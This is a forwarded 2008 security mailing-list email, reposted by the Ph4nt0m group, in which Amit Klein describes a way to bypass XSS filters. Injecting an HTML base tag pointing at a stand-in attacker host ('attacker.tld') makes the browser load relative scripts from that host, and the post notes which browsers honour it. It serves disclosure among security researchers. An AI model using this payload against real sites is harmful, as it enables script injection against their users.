base标记只能应用于<head>与</head>之间,这种方法有一定的局限性 ----- Original Message ----- From: 大风 To: [email protected] Sent: Wednesday, July 16, 2008 10:14 AM Subject: [Ph4nt0m] [zz]Nice little XSS trick
a.. From: Amit Klein <[EMAIL PROTECTED]>
b.. Subject: [WEB SECURITY] Nice little XSS trick
c.. Date: Tue, 15 Jul 2008 13:33:41 +0200
size=2 width="100%" align=center>
Hi list
Recently I've been thinking about bypassing anti-XSS filters, and a nice
little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention BASe,
but not the trick I describe here). The idea is to use the HTML BASE tag to
force loading of JS code from the attacker's host. Consider a page with XSS
vulnerability such as:
<html>...***XSS code may be embedded here***...<script
src="/foo/bar.js"></script>...</html>
Now, an attacker can inject <base href="http://www.attacker.tld/";;>, and next
thing you know, the browser (IE, at least) loads the JS from
http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
"explicit" JS code involved in the payload itself.
Note that according to the HTML standard, BASE should be placed in the HEAD
section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is
indeed observed by FF 2, but not by IE (checked IE6).
Thanks,-Amit
[Ph4nt0m]
[Ph4nt0m Security Team]
[EMAIL PROTECTED]
Email: [EMAIL PROTECTED]
PingMe:
=== V3ry G00d, V3ry Str0ng ===
=== Ultim4te H4cking ===
=== XPLOITZ ! ===
=== #_# ===
#If you brave,there is nothing you cannot achieve.#
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
